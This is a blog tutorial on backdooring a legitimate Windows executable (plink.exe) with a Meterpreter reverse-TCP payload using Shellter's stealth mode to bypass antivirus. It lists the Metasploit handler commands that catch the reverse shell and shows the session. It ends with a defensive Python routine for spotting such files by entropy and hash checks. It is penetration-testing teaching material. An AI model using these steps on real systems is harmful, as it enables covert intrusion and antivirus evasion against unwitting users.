Hopefully this overview will help get you up and running on Kali 2.0 quickly.

If you want to learn the basics of Ethical Hacking using the powerful Kali platform with step-by-step, hands-on tutorials, check out my Kali book series available on Amazon.com:

Basic Security Testing with Kali Linux

Kali 2.0 Book Cover



Anti-Virus Bypass with Shellter 5.1 on Kali Linux


Having trouble getting a Meterpreter shell past that pesky AV? Check out the new Shellter 5.1 shellcode injection tool! The latest version of Shellter for pentesters includes a “stealth” mode that retains the functionality of the original host program.

Shellter works by taking a legitimate Windows .exe file, adding the shellcode to it and then doing a great job of modifying the file for AV bypass. The program’s automatic mode makes the whole process very painless. In this tutorial I used Kali Linux 2.0 as the host and a Windows system as the target.

The new version of Shellter is not included in the repositories yet, so if you want the latest version you will need to download the zip file and install it manually.

So enough talk, let’s see it in action!

(Note: As always, never attempt to access a system that you do not have express written permission to do so. Doing so is illegal and you could end up in jail.)

1. Download and install “shellter” ( https://www.shellterproject.com/download/ )

I saved the extracted folder to the /root/Desktop folder. You will need to make the shellter.exe file executable with the chmod command.

2. Grab “plink.exe” from Kali’s ‘/usr/share/windows-binaries’ directory and copy it into the Shellter directory.

3. Change to the ‘/root/Desktop/shellter’ directory.

4. Start Shellter – type, “wine shellter.exe”

Shellter Kali 1

5. Enter “A” for automatic

6. At the PE Target Prompt, enter “plink.exe”

7. When prompted to enable stealth mode enter “Y”:

Shellter Kali 2

This new feature allows the backdoored file to still function as the original file did. A big help for Red Team pentesters.

8. When prompted for Payloads select “L” and then “1” for Meterpreter_Reverse_TCP.

9. Enter your Kali IP address for LHOST.

10. Enter a port to use (I used 4545)

Shellter Kali 3

Shellter will then add polymorphic code and obfuscate the file. When done you will see:

Shellter Kali 4

You will now have a ‘plink.exe’ (the shellcoded file) and ‘plink.exe.bak’ (the original file) in the Shellter directory.

11. Now we need to start a listener service on the Kali system using the same settings from above:

  • start Metasploit (‘msfconsole’ in a terminal)
  • use exploit/multi/handler
  • set payload windows/meterpreter/reverse_tcp
  • set lhost 192.168.1.39
  • set lport 4545
  • exploit

Shellter Kali 5

12. Copy the ‘plink.exe’ file to the Windows system:

Shellter Kali 6

13. Now, in Windows, if you run plink.exe from the command prompt:

Shellter Kali 7

It lists the help information for the file but does not trigger the remote shell yet. But if we actually use plink to connect to another system (a Raspberry Pi), as seen below:

Shellter Kali 8

Notice we get the Raspberry Pi ssh login prompt through Plink, but we also get a remote session to the Windows box:

Shellter Kali 9

We can run “sysinfo” to view information about the computer:

Shellter Kali 10

Success!

Conclusion

As you can see, a backdoored file that will bypass AV can be created pretty easily. AV is great, but it can’t stop everything; you need to train your company users to be vigilant when using internet sites, social media and e-mail. Avoid suspicious websites, don’t allow website popups or warnings to install anything, and never open unsolicited or suspicious attachments in e-mails. If you don’t know whether you should click on something, ask your IT department. A little user vigilance can go a long way toward protecting your network!
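A defender-side check that is not part of the original tutorial: the walkthrough leaves both the injected plink.exe and the untouched plink.exe.bak on disk, so the two natural baseline tests are a hash comparison against the clean copy and a per-section entropy scan for encoded payload. This added Python example implements both with a minimal PE section-table parser over a constructed stand-in binary; the section names, the 7.0 threshold and the sample data are my assumptions, not Shellter’s or the author’s.

```python
import hashlib, math, random, struct

def shannon_entropy(data: bytes) -> float:  # bits per byte: 0.0 (constant) .. 8.0 (uniform)
    if not data:
        return 0.0
    n, counts = len(data), [0] * 256
    for b in data:
        counts[b] += 1
    return -sum(c / n * math.log2(c / n) for c in counts if c)

def pe_sections(data: bytes):  # minimal section-table walk: yields (name, raw bytes)
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("not a PE image")
    num_sections = struct.unpack_from("<H", data, e_lfanew + 6)[0]
    opt_size = struct.unpack_from("<H", data, e_lfanew + 20)[0]
    table = e_lfanew + 24 + opt_size  # section headers follow the optional header
    for i in range(num_sections):
        off = table + 40 * i
        name = data[off:off + 8].rstrip(b"\0").decode("ascii", "replace")
        raw_size, raw_ptr = struct.unpack_from("<II", data, off + 16)
        yield name, data[raw_ptr:raw_ptr + raw_size]

def suspicious_sections(data: bytes, threshold: float = 7.0):
    # Sections whose entropy suggests encoded/polymorphic content: a signal, not proof,
    # since an injector can keep entropy low. Returns [(name, entropy), ...].
    return [(n, round(shannon_entropy(b), 2)) for n, b in pe_sections(data)
            if shannon_entropy(b) > threshold]

def matches_known_good(data: bytes, known_sha256: str) -> bool:
    # Integrity check against the hash of the vendor copy (plink.exe.bak in the walkthrough).
    return hashlib.sha256(data).hexdigest() == known_sha256

def build_pe(sections):  # constructed minimal PE (no optional header) so the demo runs offline
    dos = b"MZ" + b"\0" * 58 + struct.pack("<I", 64)  # e_lfanew = 64
    coff = b"PE\0\0" + struct.pack("<HHIIIHH", 0x14C, len(sections), 0, 0, 0, 0, 0x102)
    ptr, table, blobs = 64 + 24 + 40 * len(sections), b"", b""
    for name, raw in sections:
        table += name.ljust(8, "\0").encode() + struct.pack(
            "<IIIIIIHHI", len(raw), 0, len(raw), ptr, 0, 0, 0, 0, 0x60000020)
        blobs += raw
        ptr += len(raw)
    return dos + coff + table + blobs

# Constructed stand-ins: a "vendor" binary and a copy carrying an injected encoded blob.
CODE = b"plink: command-line connection utility\n" * 100  # repetitive, low entropy
BLOB = random.Random(7).getrandbits(8 * 4096).to_bytes(4096, "big")  # near-random
ORIGINAL = build_pe([(".text", CODE), (".data", b"\0" * 512)])
BACKDOORED = build_pe([(".text", CODE), (".data", BLOB)])
KNOWN_GOOD_SHA256 = hashlib.sha256(ORIGINAL).hexdigest()  # baseline from the clean copy
```

Entropy alone is only a signal, since a stealthy injector deliberately keeps it low; pair it with hash or code-signature allowlisting of the binaries you expect to see on endpoints.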

If you enjoyed this tutorial, check out my new book, “Intermediate Security Testing with Kali Linux 2”.

